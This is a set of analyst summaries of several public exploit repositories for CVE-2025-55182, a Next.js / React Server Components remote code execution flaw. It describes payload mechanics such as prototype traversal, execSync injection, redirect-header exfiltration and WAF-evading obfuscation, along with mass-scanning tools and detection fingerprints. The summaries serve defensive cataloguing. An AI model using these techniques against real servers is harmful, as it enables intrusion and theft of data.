This repository is a small standalone Go exploit containing one executable source file (main.go), a README, and a license. It is not part of a larger exploitation framework. The code implements an interactive remote command execution client for CVE-2025-55182, described as a React Server Components / Next.js issue. Structure and purpose: - main.go: complete exploit implementation. - README.md: usage instructions, affected versions, demo transcript, lab setup, and references. - LICENSE: MIT license. Main exploit flow: 1. Prompts the operator for a target host/URL. 2. Normalizes the target, defaulting to HTTPS and appending a trailing slash. 3. Performs a vulnerability check by sending a crafted multipart/form-data POST request containing a JavaScript gadget. 4. Determines success by inspecting the X-Action-Redirect response header for a /login?a= pattern. 5. If vulnerable, enters an interactive shell-like loop. 6. Each entered command is embedded into a JavaScript payload that invokes process.mainModule.require('child_process').execSync('<cmd>') on the remote Node.js server. 7. Command output is converted to a string, URL-encoded, and forced into a redirect digest targeting /login?a=<output>; the client then extracts and decodes that output from the X-Action-Redirect header. Notable implementation details: - Uses insecure TLS (InsecureSkipVerify=true), allowing exploitation of HTTPS targets with invalid/self-signed certificates. - Disables automatic redirect following so the exploit can directly inspect redirect headers. - Uses static headers Next-Action: x and X-Nextjs-Request-Id: b5dce965. - Escapes backslashes, quotes, and backticks in operator-supplied commands before embedding them in the JavaScript payload. Capabilities: - Vulnerability detection/checking. - Arbitrary command execution on the remote server. - Interactive post-exploitation command loop. - Retrieval of command output via header-based exfiltration. Overall, this is a real, concise operational exploit rather than a mere detector. It provides a basic but functional interactive RCE workflow against a vulnerable web application.

This repository is a multi-implementation exploit toolkit for CVE-2025-55182, a claimed unauthenticated remote code execution issue in React Server Components / Next.js server actions caused by unsafe deserialization. The repo contains 6 files: a Nuclei template (CVE-2025-55182.yaml), a README, a Bash scanner/exploiter, a Go implementation, and a Python implementation. Because the repository includes a Nuclei template, it can be considered framework-associated, but the repo also ships standalone exploit clients. Main capability: all implementations send a crafted multipart/form-data POST request to the target root path (/), setting Next.js-specific headers such as Next-Action, X-Nextjs-Request-Id, and X-Nextjs-Html-Request-Id. The malicious form field contains JSON that abuses prototype/constructor resolution and injects JavaScript into the _response._prefix field. That JavaScript calls process.mainModule.require('child_process').execSync('<attacker command>') on the server, captures stdout, and forces a NEXT_REDIRECT exception whose digest embeds the command output in /login?a=<output>;307;. The client then parses the X-Action-Redirect response header to determine success and recover output. Repository structure and purpose: the Nuclei YAML is a detection/exploitation check that runs arithmetic commands via either Unix shell syntax or PowerShell and validates success by matching the redirect header. The Bash script is the most feature-rich component, supporting single-target mode and mass scanning from a list, automatic protocol normalization, temporary multipart body generation, output decoding, and saving vulnerable hosts to vulnerable_hosts.txt. The Python script is a simpler standalone exploit emphasizing safer JSON escaping and disabled TLS verification. The Go program provides a compilable high-performance client, also disabling TLS verification and refusing redirects so the header can be inspected directly. Operationally, this is more than a detector: it supports arbitrary attacker-supplied commands and mass exploitation workflows. The README explicitly documents reconnaissance steps using subfinder, httpx, and nuclei, then exploitation with custom commands such as id, whoami, uname -a, and cat /etc/passwd. No hardcoded C2 or external callback infrastructure is present; the exploit is self-contained and uses the target application's own redirect header as the exfiltration channel.

This repository contains a single Python script, exploit.py, implementing a mass scanner and exploit tool for an alleged Next.js React Server Components/App Router remote code execution issue identified in the banner and comments as CVE-2025-55182. The script is not part of a larger exploit framework; it is a standalone threaded command-line tool. Structure and workflow: the script defines helper color output, a banner, URL extraction logic for piped input, and a NextExploiter class. The main() function accepts either a single URL, a file of URLs, or stdin pipeline input, then scans targets concurrently using ThreadPoolExecutor. It supports a configurable command payload, thread count, proxy, and verbose mode. There is a minor apparent coding error in the provided content where the parser line for the proxy argument is missing the parser. prefix, but the intended functionality is clear. Capabilities: first, it performs reconnaissance by issuing a GET request to each target and checking for Next.js fingerprints. It looks for the X-Powered-By: Next.js header and the /_next/static path in HTML to identify Next.js generally. It then distinguishes architecture by checking for __next_f, which it treats as App Router/RSC and therefore exploitable, versus __NEXT_DATA__, which it treats as legacy Pages Router and skips. If the target appears to be an App Router deployment, it proceeds to exploitation. Exploitation behavior: the trigger_rce() method constructs a multipart/form-data POST request to the fixed relative path /adfa on the target. The body contains a crafted serialized payload intended to reach JavaScript constructor functionality and execute arbitrary shell commands through Node.js child_process.execSync. The command is user-controlled via the -c/--cmd argument and defaults to id. The payload base64-encodes command output and throws it back in an error digest field. The script then parses the HTTP response for a "digest" value, JSON-unescapes it, base64-decodes it, and prints the resulting command output as proof of successful RCE. Fingerprintable artifacts and target indicators include the relative exploit endpoint /adfa, the detection markers /_next/static, __next_f, __NEXT_DATA__, the X-Powered-By: Next.js header, and the custom Next-Action: x request header. The script also contains an example proxy endpoint http://127.0.0.1:8080 and uses a hardcoded Chrome-like User-Agent string. Overall, this is an operational exploit script rather than a mere detector: it includes both target identification logic and an active RCE payload with arbitrary command execution and output retrieval. It is designed for bulk internet-facing web target scanning and exploitation against Next.js applications using the App Router/RSC architecture.

This repository is an intentionally vulnerable local lab for CVE-2025-55182 targeting React Server Components / Next.js App Router Server Actions. It is not a scanner; it is a working exploit lab plus ready-made exploit requests. The repository structure is small and purpose-built: a minimal Next.js application in app/layout.tsx and app/page.tsx, containerization files (Dockerfile and docker-compose.yml), dependency manifests, and a burp-payloads/ directory containing seven raw HTTP exploit templates. The application itself is minimal. app/page.tsx defines a Server Action (labAction) behind a form on the root page, ensuring POST / with a valid Next-Action header behaves like a realistic target. The Dockerfile and compose file pin and expose a vulnerable stack: Next.js 15.1.0 with React/react-dom 19.2.0, running on port 3000 in a standalone production build. The README explains setup, confirms the target endpoint, and notes that the Next-Action identifier must usually be captured from a legitimate form submission because it may change between builds. The exploit capability is concentrated in the burp-payloads/*.http files. Each sends a crafted multipart/form-data POST / request with fields 0, 1, and 2 and abuses the RSC/Server Action processing path to reach JavaScript execution. The payloads demonstrate several post-exploitation primitives: 01-rce-id.http runs id; 02-rce-whoami.http runs whoami; 03-blind-oob-http.http performs an HTTP callback to a collaborator host with command output; 04-blind-dns.http triggers a DNS lookup for blind confirmation; 05-time-based-sleep.http executes sleep 10 for timing-based detection; 06-exfil-env.http captures environment variables; and 07-read-file.http reads /etc/passwd. Several payloads exfiltrate results by throwing a crafted NEXT_REDIRECT error whose digest redirects the client to /rce?out=<encoded data>. Overall, this is an operational proof-of-concept lab repository for local authorized testing of CVE-2025-55182. It provides a reproducible vulnerable target and multiple exploit templates showing direct RCE, blind OOB signaling, timing-based confirmation, environment disclosure, and file read against a Linux-based Node.js containerized deployment.

This repository is a standalone exploit project, not part of a larger exploitation framework. Its main purpose is to demonstrate and operationalize CVE-2025-55182, a claimed unauthenticated RCE in React Server Components / Next.js Server Actions caused by unsafe deserialization and prototype pollution. The repository contains three main parts: (1) exploit/ with the primary Python exploit react2shell.py and usage notes, (2) vulnerable-app/ with a deliberately vulnerable Next.js 15.0.0 + React 19.0.0 lab application, a curl-based exploit helper, and a restoration script, and (3) docs/analysis/ with markdown writeups covering root cause, payload anatomy, and timeline. The main exploit file is exploit/react2shell.py, a Python script using requests and argparse. It builds a multipart/form-data POST request to the target root path / with headers such as Next-Action: x, X-Nextjs-Request-Id, and X-Nextjs-Html-Request-Id. The payload embeds malicious JSON for the React Flight deserializer, including the prototype-pollution primitive "__proto__:then" and a _response._prefix JavaScript snippet that invokes child_process.execSync() on attacker-controlled commands. Output is transformed to fit header constraints and exfiltrated by throwing a NEXT_REDIRECT error whose digest contains /login?a=${res};307;, which the exploit then parses from the X-Action-Redirect response header. Capabilities exposed by the exploit go beyond a minimal PoC. The script supports a vulnerability check mode, single-command RCE, and an interactive shell. Documentation and visible code structure indicate four higher-level attack modules: deleting projects from the demo dashboard, defacing the website, stealing environment variables, and shutting down displayed servers. The exfiltration logic includes a line-by-line read technique using /tmp/stolen_env.txt to avoid header size limitations. The maturity is best described as OPERATIONAL: it provides a working payload and multiple post-exploitation workflows, but it is not packaged as a reusable framework module. The vulnerable-app directory is a self-contained Next.js lab target. app/actions.ts defines a server action, app/page.tsx is a dashboard-style UI, and package.json pins next 15.0.0 with react/react-dom 19.0.0. The included curl_id.sh reproduces the same exploit logic in bash/curl, again targeting the root path and parsing X-Action-Redirect. scripts/restore.sh restores app/page.tsx, app/actions.ts, and app/layout.tsx, optionally cloning https://github.com/zack0x01/vuln-app-CVE-2025-55182.git if needed, and cleans the .next cache. Overall, this is a real exploit repository with a Python RCE exploit as the primary artifact, supported by a demo target and academic documentation. The most important fingerprintable observables are the POST target /, the exfiltration redirect pattern /login?a=..., the custom Next.js headers, local lab URL http://localhost:3000, temporary file /tmp/stolen_env.txt, and restoration-related file paths within the vulnerable app.

This repository is a self-contained proof-of-concept for CVE-2025-55182 ('React2Shell'), an alleged unauthenticated RCE in React Server Components / Next.js server action deserialization. It is not part of a larger exploit framework. The repository contains one primary exploit script, poc.py, plus environment and target application files used to reproduce the issue locally. The main exploit logic is in poc.py, a Python 3 script using requests. It accepts a target URL and an arbitrary command, then sends a multipart/form-data POST to the target root path with the Next-Action header set. The payload for field '0' is a crafted JSON object representing a fake React Flight chunk. The exploit abuses property traversal through '__proto__' and 'constructor' to reach the JavaScript Function constructor during reviveModel processing. It then injects JavaScript that loads Node's child_process module and runs execSync on the attacker-supplied command. Output is exfiltrated by throwing an Error object with a digest property, which the script parses from the HTTP response body. Exploit capability: unauthenticated remote command execution against a vulnerable Node.js application using React Flight / Next.js server actions. The operator can run commands like 'id' or 'touch /tmp/pwned'. The PoC is operational rather than weaponized: it provides a working payload and command execution path, but customization is manual and limited to the command argument. Repository structure: README.md documents the vulnerability, affected versions, setup, and sample requests. flake.nix and flake.lock define a Nix development shell with Node.js, Yarn, Python, and requests. start.sh automates building and running the vulnerable container. The target/ directory contains a minimal vulnerable Next.js application: Containerfile builds a node:20-alpine image; package.json pins next 16.0.6 and react/react-dom 19.2.0; app/page.tsx defines a simple server action form that provides the server-side action surface; layout.tsx and config files support the app. This target app exists to demonstrate and validate the exploit locally on port 3000. Notable network and fingerprintable artifacts include POST requests to the application root '/', the required Next-Action header, the default local target http://localhost:3000, optional proxying through http://localhost:8080, and demonstration file paths such as /tmp/pwned. Overall, the repository's purpose is to demonstrate and reproduce a deserialization-to-RCE chain in vulnerable React/Next.js server action handling.

This repository is a small standalone exploit PoC consisting of one Python script and a README. The main file, CVE-2025-55182.py, is a multithreaded Python exploit targeting a claimed pre-authentication RCE in React Server Components / Next.js Server Actions. It is not part of a larger framework. The exploit’s purpose is to send a crafted multipart/form-data POST request that abuses RSC/Flight deserialization and prototype-chain manipulation to reach the JavaScript Function constructor, execute attacker-controlled JavaScript in the server’s Node.js context, and then exfiltrate results through a forged NEXT_REDIRECT digest. The payload generator supports two modes: exploit mode, which runs arbitrary OS commands via child_process.execSync, and check mode, which avoids command execution and instead returns a fixed marker to confirm likely reachability of the vulnerable code path. Repository structure is minimal: README.md documents the vulnerability claim, affected versions, usage examples, and output semantics; CVE-2025-55182.py contains all exploit logic, CLI parsing, payload construction, HTTP request generation, response parsing, batch processing, proxy support, and result logging. The script accepts either a single URL or a file of targets, supports concurrent scanning with ThreadPoolExecutor, optional HTTP/SOCKS proxying, timeout and TLS verification controls, and writes confirmed vulnerable hosts to an output file. Notable exploit capabilities include: arbitrary command execution on vulnerable Node.js-backed targets, extraction of command output, batch exploitation/checking across many hosts, and a non-destructive verification mode. Fingerprintable artifacts include the use of the Next-Action header, multipart/form-data requests, the redirect path /x?r= for exfiltration, and local file references such as targets.txt and results.txt. Overall, this is an operational PoC exploit rather than a mere detector, because it includes a working command-execution payload and output recovery channel.

The repository is a small standalone Python exploit project with two files: a README and a single executable script, rce_exploit.py. The script is the main entry point and implements batch exploitation against a list of web targets. It accepts a filename containing URLs and an operator-supplied command, normalizes targets to HTTP if no scheme is present, and sends a crafted multipart/form-data POST request to each target using the requests library with TLS verification disabled. The exploit logic is in check_vulnerability(). It builds a JSON structure named crafted_chunk containing fields such as then, status, reason, value, and _response. The critical part is the _prefix field, which injects JavaScript intended to run in a Node.js server context: it calls process.mainModule.require('child_process').execSync() with the user-provided command and a 5-second timeout, converts the output to a string, and throws an error object whose digest property contains the command output. After the POST request, the script searches the response body for a "digest" field and treats its presence as evidence of successful code execution. If found, it prints the extracted output and marks the target as vulnerable. Capabilities: the tool performs active remote exploitation rather than passive detection. It can execute arbitrary shell commands supplied by the operator on vulnerable targets and exfiltrate stdout through the HTTP response. It also supports batch processing of multiple targets from a file and provides simple CLI status output for vulnerable, non-vulnerable, timeout, and connection-error cases. There are no hardcoded external IPs, domains, or callback servers in the repository. Network interaction is limited to direct POST requests to operator-supplied target URLs. The exploit appears operational because it contains a complete request routine and a working payload path, but it is not part of a larger framework and does not provide advanced payload management beyond a single command string.

This repository is a working proof-of-concept exploit for CVE-2025-55182, described as an unauthenticated RCE affecting React Server Components / Next.js Server Actions. The repo has two main parts: (1) a vulnerable demo application under next-app/ built with create-next-app and configured to run in Docker, and (2) a standalone exploit script at the repository root in poc.ts. The vulnerable app is intentionally minimal. next-app/app/actions.ts defines a server action (testAction), and next-app/app/page.tsx renders a form bound to that action so Next.js emits a hidden $ACTION_ID_<40 hex> field in the HTML. The Dockerfile and docker-compose.yml package and expose the app on port 3000, making it easy to reproduce the issue locally. The actual exploit logic is in poc.ts. It first performs a GET request to the base URL and extracts the Server Action ID from the HTML using a regex. It then sends a crafted multipart/form-data POST to the same base URL with the Next-Action header set to that action ID. The payload abuses React Flight chunk references, prototype traversal, thenable behavior, and a controlled _response/_formData gadget to reach Function construction and ultimately execute process.mainModule.require('child_process').execSync('<command>'). The command is user-supplied via CLI, escaped, and inserted into the payload, making this an operational RCE PoC rather than a simple detector. Repository structure is straightforward: README.md contains a detailed vulnerability explanation, setup, and exploitation steps; poc.ts is the exploit entry point; thenable-test.js is a tiny helper/demo showing JavaScript thenable behavior; next-app/ contains the reproducible vulnerable target application and containerization files. Overall, the repository’s purpose is to demonstrate and validate unauthenticated remote code execution against vulnerable Next.js/React Server Components deployments.

Repository contains a single Python proof-of-concept exploit (rce.py) plus README and Apache-2.0 license. The PoC targets CVE-2025-55182 described as a React Server Components hydration/input-validation issue enabling prototype pollution using the key "$1:__proto__:then". The exploit crafts a manual multipart/form-data body that mimics an RSC request, sets a trigger header (Next-Action: x), and injects JavaScript into an RSC field (_response._prefix) that executes OS commands via Node.js: process.mainModule.require('child_process').execSync(<cmd>). Output is exfiltrated by intentionally throwing a NEXT_REDIRECT error whose digest encodes a redirect to /login?a=${res}; the script then parses the server’s X-Action-Redirect response header to recover the command output. Two strategies are implemented: 'standard' (literal 'child_process') and 'obfuscated' (hex-decoded module name via Buffer.from(...,'hex')) to evade basic WAF signatures. The exploit is network-based, requires only python3 + requests, disables TLS verification, and posts directly to the provided target URL (defaulting to https:// if no scheme is supplied).